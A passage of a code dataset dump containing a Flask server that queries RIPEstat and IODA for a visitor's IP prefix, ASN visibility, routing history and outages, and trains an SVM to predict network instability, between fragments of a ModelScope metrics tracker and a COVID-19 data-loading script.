f'{key.upper()}-{val:.3f}'\n metric_strs.append(metric_str)\n if 'token_nll' in self.metrics_avg:\n metric_str = f\"TOKEN_PPL-{math.exp(self.metrics_avg['token_nll']):.3f}\"\n metric_strs.append(metric_str)\n metric_strs = ' '.join(metric_strs)\n return metric_strs\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/trainers/nlp/space/metrics/metrics_tracker.py","file_name":"metrics_tracker.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"10852355774","text":"from asyncio import events\nfrom pytz import country_names\nimport requests\nimport json\nfrom requests import get\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom flask import request\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\n\napp = Flask(__name__)\n\nCORS(app)\n\n\n@ app.route('/', methods=['GET'])\ndef get_tasks():\n if request.environ.get('HTTP_X_FORWARDED_FOR') is None:\n return {'ip': request.environ['REMOTE_ADDR']}\n else:\n return {'ip': request.environ['HTTP_X_FORWARDED_FOR']}\n\n\n@ app.route(\"/ip\")\n# private=socket.gethostbcket.gethos\n# adr=\"185.185.179.8\"\ndef ip_info():\n ip = {}\n adrr = get_tasks()\n adr = adrr['ip']\n\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n sourcevisib = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+adr+\"%2F24\"\n\n responseip = requests.get(sourceip).json()\n visible = requests.get(sourcevisib).json()\n\n prefix = responseip[\"data\"][\"records\"][0][0][\"value\"]\n ip[\"prefix\"] = prefix\n\n rpki = \"https://stat.ripe.net/data/rpki-validation/data.json?resource=38999&prefix=\"+prefix\n pk = requests.get(rpki).json()\n isp = responseip[\"data\"][\"records\"][0][1][\"value\"]\n ip[\"isp\"] = 
isp\n country = responseip[\"data\"][\"records\"][0][2][\"value\"]\n ip[\"country\"] = country\n ipp = responseip[\"data\"][\"irr_records\"][0][0][\"value\"]\n ip[\"ip\"] = ipp\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n ip[\"asncode\"] = a\n ip[\"asnname\"] = b\n if (any(c.isalpha() for c in b) == False):\n ip[\"asncode\"] = b\n ip[\"asnname\"] = a\n\n try:\n rpk = pk[\"data\"][\"validating_roas\"][\"validity\"]\n ip[\"rpki\"] = rpk\n except:\n ip[\"rpki\"] = \"Not valid\"\n\n ipv4_seeing = visible[\"data\"][\"visibility\"][\"v4\"][\"ris_peers_seeing\"]\n ipv4_total = visible[\"data\"][\"visibility\"][\"v4\"][\"total_ris_peers\"]\n\n if (ipv4_seeing == ipv4_total):\n ip[\"ipv4\"] = 100\n print(\"100% visibility ipv4\")\n else:\n per = (ipv4_seeing*100)/ipv4_total\n ip[\"ipv4\"] = per\n print(str(per)+\"% Visibility ipv4\")\n\n ipv6_seeing = visible[\"data\"][\"visibility\"][\"v6\"][\"ris_peers_seeing\"]\n ipv6_total = visible[\"data\"][\"visibility\"][\"v6\"][\"total_ris_peers\"]\n\n if (ipv6_seeing == ipv6_total):\n ip[\"ipv6\"] = 100\n print(\"100% visibility ipv6\")\n else:\n per = (ipv6_seeing*100)/ipv6_total\n ip[\"ipv6\"] = per\n print(str(per)+\"% Visibility ipv6\")\n\n with open(\"ip.json\", \"w\") as outfile:\n json.dump(ip, outfile)\n\n return ip\n\n\n@ app.route(\"/as\")\ndef asn_info():\n adrr = get_tasks()\n adr = adrr['ip']\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n dictionary = {}\n sous_dictionnaire = {}\n dictionnaire = {}\n # sourceasn=\"https://stat.ripe.net/data/country-resource-list/data.json?resource=LB\"\n # responseasn = requests.get(sourceasn).json()\n # ASN=responseasn[\"data\"][\"resources\"][\"asn\"]\n\n # for asn in ASN:\n source = \"https://stat.ripe.net/data/visibility/data.json?include=peers_seeing&resource=\"+asn\n source2 = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+asn\n source3 = \"https://stat.ripe.net/data/whois/data.json?resource=\"+asn\n source1 = 'https://ihr.iijlab.net/ihr/api/networks/?number='+asn\n\n # nb of prefixes for each autonomous system\n url = \"https://stat.ripe.net/data/routing-status/data.json?resource=\"+asn\n response1 = requests.get(url).json()\n nb = response1[\"data\"][\"announced_space\"][\"v4\"][\"prefixes\"] + \\\n response1[\"data\"][\"announced_space\"][\"v6\"][\"prefixes\"]\n sous_dictionnaire[\"Number of prefixes\"] = nb\n sous_dictionnaire[\"v4\"] = response1[\"data\"][\"announced_space\"][\"v4\"][\"prefixes\"]\n sous_dictionnaire[\"v6\"] = response1[\"data\"][\"announced_space\"][\"v6\"][\"prefixes\"]\n\n # list of prefixes for an as\n list_prefixe = \"https://stat.ripe.net/data/announced-prefixes/data.json?resource=\"+asn\n lists = requests.get(list_prefixe).json()\n j = 0\n for i in lists[\"data\"][\"prefixes\"]:\n prefix = i[\"prefix\"]\n print(prefix)\n dictionnaire[j] = prefix\n j = j+1\n sous_dictionnaire[\"List of prefixes\"] = dictionnaire\n ipv4_seeing = 0\n ipv4_total = 0\n ipv6_seeing = 0\n ipv6_total = 0\n response1 = requests.get(source2).json()\n response2 = requests.get(source3).json()\n response3 = requests.get(source1).json()\n\n 
print(\"Time:\")\n time = response1[\"data\"][\"last_seen\"][\"time\"]\n sous_dictionnaire[\"time\"] = time\n print(time)\n\n name = response2[\"data\"][\"records\"][0][1][\"value\"]\n print(\"ASN name:\"+name)\n print(response1[\"data\"][\"visibility\"])\n sous_dictionnaire[\"name\"] = name\n print(name)\n\n disco = response3[\"results\"][0][\"disco\"]\n print(\"Disconnection:\"+str(disco))\n sous_dictionnaire[\"disconnection\"] = disco\n\n for i in response1:\n ipv4_seeing = response1[\"data\"][\"visibility\"][\"v4\"][\"ris_peers_seeing\"]\n ipv4_total = response1[\"data\"][\"visibility\"][\"v4\"][\"total_ris_peers\"]\n if (ipv4_seeing == ipv4_total):\n sous_dictionnaire[\"ipv4\"] = 100\n print(\"100% visibility ipv4\")\n else:\n per = (ipv4_seeing*100)/ipv4_total\n sous_dictionnaire[\"ipv4\"] = per\n print(str(per)+\"% Visibility ipv4\")\n\n for i in response1:\n ipv6_seeing = response1[\"data\"][\"visibility\"][\"v6\"][\"ris_peers_seeing\"]\n ipv6_total = response1[\"data\"][\"visibility\"][\"v6\"][\"total_ris_peers\"]\n if (ipv6_seeing == ipv6_total):\n sous_dictionnaire[\"ipv6\"] = 100\n print(\"100% visibility ipv6\")\n else:\n per = (ipv6_seeing*100)/ipv6_total\n sous_dictionnaire[\"ipv6\"] = per\n print(str(per)+\"% Visibility ipv6\")\n\n dictionary[asn] = sous_dictionnaire\n with open(\"sample.json\", \"w\") as outfile:\n json.dump(dictionary, outfile, indent=4)\n\n return dictionary\n\n\n# def event():\n# # dict = {}\n# #\n# # previous_date = datetime.datetime.today() - datetime.timedelta(days=1)\n# # times = str(int(round(previous_date.timestamp())))\n# #\n# # curr_date = datetime.datetime.now()\n# # times1 = str(int(round(curr_date.timestamp())))\n# #\n# url = 'https://ioda.caida.org/ioda/data/events?from=' + \\\n# times+'&until='+times1+'&human=true&meta=country/LB'\n# # events = requests.get(url).json()\n# #\n# # start_time = events[\"queryParameters\"][\"from\"]\n# # end_time = events[\"queryParameters\"][\"until\"]\n# #\n# # timestamp = datetime.datetime.fromtimestamp(int(start_time))\n# # start = timestamp.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # timestamp1 = datetime.datetime.fromtimestamp(int(end_time))\n# # end = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # print(\"Events occured:\")\n# # list_events = events[\"data\"][\"events\"]\n# print(list_events)\n# # dict[\"Events\"] = list_events\n# #\n# print(\"Country:\")\n# # place = events[\"queryParameters\"][\"meta\"]\n# print(place)\n# # dict[\"Country\"] = place\n# #\n# # print(\"Start time:\")\n# print(start)\n# # dict[\"Start-time\"] = start\n# # print(\"End time:\")\n# print(end)\n# # dict[\"End-time\"] = end\n# #\n# with open(\"events.json\", \"w\") as outfile:\n# # json.dump(dict, outfile)\n# #\n# #\n# def alert():\n# # dict = {}\n# #\n# # curr_date = datetime.datetime.now()\n# print(curr_date)\n# # timestamp = str(int(round(curr_date.timestamp())))\n# print(timestamp)\n# #\n# url = 'https://ioda.caida.org/ioda/data/alerts?from='+timestamp + \\\n# '&until='+timestamp+'&annotateMeta=true&human=true&meta=country/LB'\n# # alerts = requests.get(url).json()\n# #\n# # start_time = alerts[\"queryParameters\"][\"from\"]\n# # end_time = alerts[\"queryParameters\"][\"until\"]\n# #\n# # timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n# # start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # timestamp2 = datetime.datetime.fromtimestamp(int(end_time))\n# # end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# print(\"Alerts:\")\n# # list_alerts = alerts[\"data\"][\"alerts\"]\n# print(list_alerts)\n# # 
dict[\"Alerts\"] = list_alerts\n# #\n# # print(\"Start time:\")\n# print(start)\n# # dict[\"Start-time\"] = start\n# # print(\"End time:\")\n# print(end)\n# # dict[\"End-time\"] = end\n# #\n# with open(\"alerts.json\", \"w\") as outfile:\n# # json.dump(dict, outfile)\n# #\n# #\n# event()\n# alert()\n@ app.route(\"/history\")\ndef History():\n adrr = get_tasks()\n adr = adrr['ip']\n # adr='94.187.8.0'\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n\n history = {}\n\n sous_dict = {}\n\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\"+asn\n\n hist = requests.get(url).json()\n\n liste = []\n\n pref = responseip[\"data\"][\"records\"][0][0][\"value\"]\n pref = pref[0:(len(pref)-3)]\n\n for p in hist[\"data\"][\"by_origin\"][0][\"prefixes\"]:\n\n liste.append(p[\"prefix\"])\n\n j = 0\n while(j < len(liste)):\n liste[j] = liste[j][0:(len(liste[j])-3)]\n j = j+1\n\n for l in liste:\n\n if (pref == l):\n\n # date = \"2022\"\n\n i = 0\n\n for d in p[\"timelines\"]:\n\n # print(d)\n\n # print(d[\"starttime\"])\n\n if \"2022\" in d[\"starttime\"]:\n\n sous_dict[d[\"starttime\"][0:10]] = d[\"full_peers_seeing\"]\n sous_dict[d[\"endtime\"][0:10]] = d[\"full_peers_seeing\"]\n i = i+1\n\n return sous_dict\n\n\n@ app.route(\"/all\")\ndef All():\n\n adrr = get_tasks()\n adr = adrr['ip']\n # adr='91.232.100.0'\n dictionnaire = {}\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n sous_dict = {}\n\n list_prefixe = \"https://stat.ripe.net/data/announced-prefixes/data.json?resource=\"+asn\n lists = requests.get(list_prefixe).json()\n j = 0\n for i in lists[\"data\"][\"prefixes\"]:\n prefix = i[\"prefix\"]\n dictionnaire[j] = prefix\n j = j+1\n sous_dict = {}\n\n k = 0\n\n while (k < len(dictionnaire)):\n\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\" + \\\n str(dictionnaire[k][0:(len(dictionnaire[k])-3)])\n\n hist = requests.get(url).json()\n\n for p in hist[\"data\"][\"by_origin\"]:\n if (p[\"origin\"] == asn):\n\n for d in p[\"prefixes\"][0][\"timelines\"]:\n # print(d)\n\n # print(d[\"starttime\"])\n\n if \"2022\" in d[\"starttime\"]:\n if (d[\"starttime\"][0:10] in sous_dict.keys()):\n sous_dict[d[\"starttime\"][0:10]] = sous_dict[d[\"starttime\"]\n [0:10]]+d[\"full_peers_seeing\"]\n if (d[\"endtime\"][0:10] in sous_dict.keys()):\n sous_dict[d[\"endtime\"][0:10]] = sous_dict[d[\"endtime\"]\n [0:10]] + d[\"full_peers_seeing\"]\n else:\n sous_dict[d[\"starttime\"][0:10]\n ] = d[\"full_peers_seeing\"]\n sous_dict[d[\"endtime\"][0:10]\n ] = d[\"full_peers_seeing\"]\n\n k = k+1\n for i in sous_dict.keys():\n sous_dict[i] = sous_dict[i]/len(dictionnaire)\n\n return sous_dict\n\n\n@ app.route(\"/pred\")\ndef Pred():\n adrr = get_tasks()\n adr = adrr['ip']\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = 
responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n url = 'https://stat.ripe.net/data/bgp-update-activity/data.json?endtime=2022-04-11T12%3A00%3A00&hide_empty_samples=false&max_samples=5000&resource=AS' + \\\n str(asn)+'&starttime=2021-04-11T00%3A00%3A00'\n r = requests.get(url)\n json = r.json()\n return json\n\n\n@ app.route(\"/pay\")\ndef pays():\n country_names = {\n \"afghanistan\": \"AF\",\n \"land Islands\": \"AX\",\n \"albania\": \"AL\",\n \"algeria\": \"DZ\",\n \"american Samoa\": \"AS\",\n \"andorrA\": \"AD\",\n \"angola\": \"AO\",\n \"anguilla\": \"AI\",\n \"antarctica\": \"AQ\",\n \"antigua and Barbuda\": \"AG\",\n \"argentina\": \"AR\",\n \"armenia\": \"AM\",\n \"aruba\": \"AW\",\n \"australia\": \"AU\",\n \"austria\": \"AT\",\n \"azerbaijan\": \"AZ\",\n \"bahamas\": \"BS\",\n \"bahrain\": \"BH\",\n \"bangladesh\": \"BD\",\n \"barbados\": \"BB\",\n \"belarus\": \"BY\",\n \"belgium\": \"BE\",\n \"belize\": \"BZ\",\n \"benin\": \"BJ\",\n \"bermuda\": \"BM\",\n \"bhutan\": \"BT\",\n \"bolivia\": \"BO\",\n \"bosnia and herzegovina\": \"BA\",\n \"botswana\": \"BW\",\n \"bouvet island\": \"BV\",\n \"brazil\": \"BR\",\n \"british indian ocean territory\": \"IO\",\n \"brunei darussalam\": \"BN\",\n \"bulgaria\": \"BG\",\n \"burkina faso\": \"BF\",\n \"burundi\": \"BI\",\n \"cambodia\": \"KH\",\n \"cameroon\": \"CM\",\n \"canada\": \"CA\",\n \"cape verde\": \"CV\",\n \"cayman islands\": \"KY\",\n \"central african republic\": \"CF\",\n \"chad\": \"TD\",\n \"chile\": \"CL\",\n \"china\": \"CN\",\n \"christmas island\": \"CX\",\n \"cocos (Keeling) islands\": \"CC\",\n \"colombia\": \"CO\",\n \"comoros\": \"KM\",\n \"congo\": \"CG\",\n \"congo, The Democratic Republic of the\": \"CD\",\n \"cook islands\": \"CK\",\n \"costa rica\": \"CR\",\n \"cote d\\\"ivoire\": \"CI\",\n \"croatia\": \"HR\",\n \"cuba\": \"CU\",\n \"cyprus\": \"CY\",\n \"czech republic\": \"CZ\",\n \"denmark\": \"DK\",\n \"djibouti\": \"DJ\",\n \"dominica\": \"DM\",\n \"dominican republic\": \"DO\",\n \"ecuador\": \"EC\",\n \"egypt\": \"EG\",\n \"el salvador\": \"SV\",\n \"equatorial guinea\": \"GQ\",\n \"eritrea\": \"ER\",\n \"estonia\": \"EE\",\n \"ethiopia\": \"ET\",\n \"falkland islands (malvinas)\": \"FK\",\n \"faroe islands\": \"FO\",\n \"fiji\": \"FJ\",\n \"finland\": \"FI\",\n \"france\": \"FR\",\n \"french guiana\": \"GF\",\n \"french polynesia\": \"PF\",\n \"french southern territories\": \"TF\",\n \"gabon\": \"GA\",\n \"gambia\": \"GM\",\n \"georgia\": \"GE\",\n \"germany\": \"DE\",\n \"ghana\": \"GH\",\n \"gibraltar\": \"GI\",\n \"greece\": \"GR\",\n \"greenland\": \"GL\",\n \"grenada\": \"GD\",\n \"guadeloupe\": \"GP\",\n \"guam\": \"GU\",\n \"guatemala\": \"GT\",\n \"guernsey\": \"GG\",\n \"guinea\": \"GN\",\n \"guinea-bissau\": \"GW\",\n \"guyana\": \"GY\",\n \"haiti\": \"HT\",\n \"heard island and mcdonald islands\": \"HM\",\n \"holy see (vatican city state)\": \"VA\",\n \"honduras\": \"HN\",\n \"hong kong\": \"HK\",\n \"hungary\": \"HU\",\n \"iceland\": \"IS\",\n \"india\": \"IN\",\n \"indonesia\": \"ID\",\n \"iran, islamic republic of\": \"IR\",\n \"iraq\": \"IQ\",\n \"ireland\": \"IE\",\n \"isle of man\": \"IM\",\n \"israel\": \"IL\",\n \"italy\": \"IT\",\n \"jamaica\": \"JM\",\n \"japan\": \"JP\",\n \"jersey\": \"JE\",\n \"jordan\": \"JO\",\n \"kazakhstan\": \"KZ\",\n \"kenya\": \"KE\",\n \"kiribati\": \"KI\",\n \"korea, 
democratic people\\\"s republic of\": \"KP\",\n \"korea, republic of\": \"KR\",\n \"kuwait\": \"KW\",\n \"kyrgyzstan\": \"KG\",\n \"lao people\\\"s democratic republic\": \"LA\",\n \"latvia\": \"LV\",\n \"lebanon\": \"LB\",\n \"lesotho\": \"LS\",\n \"liberia\": \"LR\",\n \"libyan Arab Jamahiriya\": \"LY\",\n \"liechtenstein\": \"LI\",\n \"lithuania\": \"LT\",\n \"luxembourg\": \"LU\",\n \"macao\": \"MO\",\n \"macedonia, the former yugoslav republic of\": \"MK\",\n \"madagascar\": \"MG\",\n \"malawi\": \"MW\",\n \"malaysia\": \"MY\",\n \"maldives\": \"MV\",\n \"mali\": \"ML\",\n \"malta\": \"MT\",\n \"marshall islands\": \"MH\",\n \"martinique\": \"MQ\",\n \"mauritania\": \"MR\",\n \"mauritius\": \"MU\",\n \"mayotte\": \"YT\",\n \"mexico\": \"MX\",\n \"micronesia, federated states of\": \"FM\",\n \"moldova, republic of\": \"MD\",\n \"monaco\": \"MC\",\n \"mongolia\": \"MN\",\n \"montenegro\": \"ME\",\n \"montserrat\": \"MS\",\n \"morocco\": \"MA\",\n \"mozambique\": \"MZ\",\n \"myanmar\": \"MM\",\n \"namibia\": \"NA\",\n \"nauru\": \"NR\",\n \"nepal\": \"NP\",\n \"netherlands\": \"NL\",\n \"netherlands antilles\": \"AN\",\n \"new caledonia\": \"NC\",\n \"new zealand\": \"NZ\",\n \"nicaragua\": \"NI\",\n \"niger\": \"NE\",\n \"nigeria\": \"NG\",\n \"niue\": \"NU\",\n \"norfolk island\": \"NF\",\n \"northern mariana islands\": \"MP\",\n \"norway\": \"NO\",\n \"oman\": \"OM\",\n \"pakistan\": \"PK\",\n \"palau\": \"PW\",\n \"palestinian territory, occupied\": \"PS\",\n \"panama\": \"PA\",\n \"papua new guinea\": \"PG\",\n \"paraguay\": \"PY\",\n \"peru\": \"PE\",\n \"philippines\": \"PH\",\n \"pitcairn\": \"PN\",\n \"poland\": \"PL\",\n \"portugal\": \"PT\",\n \"puerto rico\": \"PR\",\n \"qatar\": \"QA\",\n \"reunion\": \"RE\",\n \"romania\": \"RO\",\n \"russian federation\": \"RU\",\n \"rwanda\": \"RW\",\n \"saint helena\": \"SH\",\n \"saint kitts and nevis\": \"KN\",\n \"saint lucia\": \"LC\",\n \"saint pierre and miquelon\": \"PM\",\n \"saint vincent and the grenadines\": \"VC\",\n \"samoa\": \"WS\",\n \"san marino\": \"SM\",\n \"sao tome and principe\": \"ST\",\n \"saudi arabia\": \"SA\",\n \"senegal\": \"SN\",\n \"serbia\": \"RS\",\n \"seychelles\": \"SC\",\n \"sierra leone\": \"SL\",\n \"singapore\": \"SG\",\n \"slovakia\": \"SK\",\n \"slovenia\": \"SI\",\n \"solomon islands\": \"SB\",\n \"somalia\": \"SO\",\n \"south africa\": \"ZA\",\n \"south georgia and the south sandwich islands\": \"GS\",\n \"spain\": \"ES\",\n \"sri lanka\": \"LK\",\n \"sudan\": \"SD\",\n \"s\": \"SR\",\n \"svalbard and jan mayen\": \"SJ\",\n \"swaziland\": \"SZ\",\n \"sweden\": \"SE\",\n \"switzerland\": \"CH\",\n \"syrian arab republic\": \"SY\",\n \"taiwan, province of china\": \"TW\",\n \"tajikistan\": \"TJ\",\n \"tanzania, united republic of\": \"TZ\",\n \"thailand\": \"TH\",\n \"timor-leste\": \"TL\",\n \"togo\": \"TG\",\n \"tokelau\": \"TK\",\n \"tonga\": \"TO\",\n \"trinidad and tobago\": \"TT\",\n \"tunisia\": \"TN\",\n \"turkey\": \"TR\",\n \"turkmenistan\": \"TM\",\n \"turks and caicos islands\": \"TC\",\n \"tuvalu\": \"TV\",\n \"uganda\": \"UG\",\n \"ukraine\": \"UA\",\n \"united arab emirates\": \"AE\",\n \"united kingdom\": \"GB\",\n \"united states\": \"US\",\n \"united states minor outlying islands\": \"UM\",\n \"uruguay\": \"UY\",\n \"uzbekistan\": \"UZ\",\n \"vanuatu\": \"VU\",\n \"venezuela\": \"VE\",\n \"viet nam\": \"VN\",\n \"virgin islands, british\": \"VG\",\n \"virgin islands, U.S.\": \"VI\",\n \"wallis and futuna\": \"WF\",\n \"western sahara\": \"EH\",\n \"yemen\": \"YE\",\n \"zambia\": 
\"ZM\",\n \"zimbabwe\": \"ZW\"\n }\n return country_names\n\n# @app.route(\"/alert\")\n# def alert():\n# dict = {}\n\n# curr_date = datetime.datetime.now()\n\n# timestamp = str(int(round(curr_date.timestamp())))\n\n\n# url = 'https://ioda.caida.org/ioda/data/alerts?from='+timestamp + \\\n# '&until='+timestamp+'&annotateMeta=true&human=true&meta=asn/3307'\n# alerts = requests.get(url).json()\n\n# start_time = alerts[\"queryParameters\"][\"from\"]\n# end_time = alerts[\"queryParameters\"][\"until\"]\n\n# timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n# start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n\n# timestamp2 = datetime.datetime.fromtimestamp(int(end_time))\n# end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n\n\n# list_alerts = alerts[\"data\"][\"alerts\"]\n\n# dict[\"Alerts\"] = list_alerts\n\n\n# dict[\"Start-time\"] = start\n\n\n# dict[\"End-time\"] = end\n\n# s=\"\"\n\n# if not list_alerts:\n# s=\"No Outages are expected\"\n# return s\n# else:\n# return list_alerts\n\n@ app.route(\"/message\")\ndef message():\n adrr = get_tasks()\n adr = adrr['ip']\n\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n dict = {}\n mssg = {}\n previous_date = datetime.datetime.today() - datetime.timedelta(days=1)\n times = str(int(round(previous_date.timestamp())))\n\n curr_date = datetime.datetime.now()\n times1 = str(int(round(curr_date.timestamp())))\n\n url = 'https://ioda.caida.org/ioda/data/events?from=' + \\\n times+'&until='+times1+'&human=true&meta=asn/'+asn\n events = requests.get(url).json()\n\n start_time = events[\"queryParameters\"][\"from\"]\n end_time = events[\"queryParameters\"][\"until\"]\n\n timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n\n timestamp2 = datetime.datetime.fromtimestamp(int(end_time))\n end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n\n list_events = events[\"data\"][\"events\"]\n\n dict[\"events\"] = list_events\n\n dict[\"Start-time\"] = start\n\n dict[\"End-time\"] = end\n\n s = \"\"\n\n if not list_events:\n s = \"No outages occured while you were away\"\n mssg[\"outages\"] = s\n\n else:\n s = \"An Outage Occured\"\n mssg[\"outages\"] = s\n\n return mssg\n\n@app.route(\"/ml\")\ndef ML():\n adrr = get_tasks()\n adr=adrr['ip']\n #adr='94.187.8.0'\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b=responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a)==False):\n asn=a\n if (any(c.isalpha() for c in b)==False):\n asn=b\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\"+asn\n\n pref = responseip[\"data\"][\"records\"][0][0][\"value\"]\n pref=pref[0:(len(pref)-3)]\n url = 'https://stat.ripe.net/data/bgp-update-activity/data.json?endtime=2022-04-15T12%3A00%3A00&hide_empty_samples=false&max_samples=10000&resource='+pref+'&starttime=2021-04-29T00%3A00%3A00'\n r = requests.get(url)\n json = r.json()\n df = pd.DataFrame(json['data']['updates'])\n df.drop(\"starttime\", axis=1, inplace=True)\n r=df.shape[0]-1\n nb=df.iloc[r,0:2].values\n df = df.drop(df.shape[0]-1, axis=0)\n 
l=[]\n av=df[\"announcements\"].mean()\n l.append(int(df[\"announcements\"][0]>av))\n l.append(int(df[\"announcements\"][1]>av))\n i=2\n while (i<df.shape[0]):\n m=(df[\"announcements\"][i-1]+df[\"announcements\"][i-2])/2\n if (df[\"announcements\"][i]<m):\n l.append(0)\n else:\n l.append(1)\n i=i+1\n df[\"label\"]=l\n\n\n training_set, test_set = train_test_split(df, test_size = 0.2) \n\n X_train = training_set.iloc[:,0:2].values\n Y_train = training_set.iloc[:,2].values\n\n\n classifier = SVC(kernel='rbf', random_state = 1,gamma=0.01)\n classifier.fit(X_train,Y_train)\n Y_pred = classifier.predict(nb.reshape(1, -1))\n s=\"\"\n mssg={}\n\n if (Y_pred[0]==1):\n\n s=\"Your network is prone to instability in the upcoming hours!\"\n mssg[\"outages\"]=s\n\n else:\n s=\"Safe:No instability detected!\"\n mssg[\"outages\"]=s\n\n return mssg\n\n# if __name__ == \"__main__\":\n# app.run(debug=True)","repo_name":"ElioBouJaoudeh/FlaskServerIntermeter","sub_path":"ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":24845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28142879535","text":"import logging\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pathlib import Path\nimport sys\n\n\n\ndef get_covid_data_jhu(category, region='US'):\n ''' Get COVID-19 data from Johns Hopkins University; return DataFrame.'''\n\n # pd.read_csv() will raise exception if the file name is not valid,\n # this assert statement provides valid tags (as of 2020-05-19)\n p = category in {'confirmed', 'deaths'}\n assert p, print(f'category {category} not recognized')\n \n covid_csv_file = (\n 'https://raw.githubusercontent.com'\n '/CSSEGISandData'\n '/COVID-19'\n '/master'\n '/csse_covid_19_data'\n '/csse_covid_19_time_series'\n f'/time_series_covid19_{category}_{region}.csv'\n )\n t = pd.read_csv(covid_csv_file)\n logging.info('function %s | covid_file = %s', 'get_covid_data_jhu', covid_csv_file)\n logging.info('function %s | category %s | shape %r', 'get_covid_data_jhu', category, t.shape)\n \n return t\n\ndef reshape(df, category):\n ''' Convert dataframe to tidy format.\n \n Input: 1 row for each state+county; 1 column for each date\n \n Output: 1 row for each date (as index, with type datetime64[D]); \n 1 column for each state+county (as multi-index)\n '''\n\n date_idx = df.columns.get_loc('1/22/20')\n\n t = (df.melt(id_vars = ['Province_State', 'Admin2'],\n value_vars = df.columns[date_idx : ],\n var_name = 'date',\n value_name = category,\n )\n .assign(date = lambda x: pd.to_datetime(x['date'], \n format='%m/%d/%y', \n errors='coerce'))\n .set_index(['date', 'Province_State', 'Admin2'], \n verify_integrity=True)\n .sort_index()\n .squeeze()\n .unstack(level=['Province_State', 'Admin2'])\n )\n \n # we use `.sort_index()` so don't need these `assert` statements\n assert t.index.is_monotonic_increasing\n assert t.columns.is_monotonic_increasing\n logging.info('function %s | category %s | shape %r', 'reshape', category, t.shape)\n \n return t\n\ndef extract_population(df):\n \n ''' Extract US population data from the `deaths` dataframe.\n \n Input: dataframe with US deaths (and population!)\n Output: pandas series with population (multi-index by State, County)\n '''\n \n t = (df\n .filter(['Province_State', 'Admin2', 'Population'])\n .set_index(['Province_State', 'Admin2'], verify_integrity=True)\n .sort_index()\n .squeeze()\n )\n \n logging.info('function %s | shape %r', 'extract_population', t.shape)\n 
logging.info('status : done extracting population')\n\n return t\n\nclass Error(Exception):\n ''' Base class for exceptions in this module.'''\n pass\n\nclass DataValidationError(Error):\n def __init__(self, message):\n self.message = message\n\n\ndef initial_validation(dfs, pop, categories):\n\n # validation\n \n p = set(dfs.keys()) == set(categories)\n if not p:\n raise DataValidationError('dict keys != categories')\n\n p = (dfs['confirmed'].index == dfs['deaths'].index).all()\n if not p:\n raise DataValidationError('confirmed index != deaths index')\n \n p = (dfs['confirmed'].columns == dfs['deaths'].columns).all()\n if not p:\n raise DataValidationError('confirmed columns != deaths columns')\n\n p = (dfs['confirmed'].columns == pop.index).all()\n if not p:\n raise DataValidationError('confirmed columns != population index')\n\n logging.info('function %s | status : all initial data 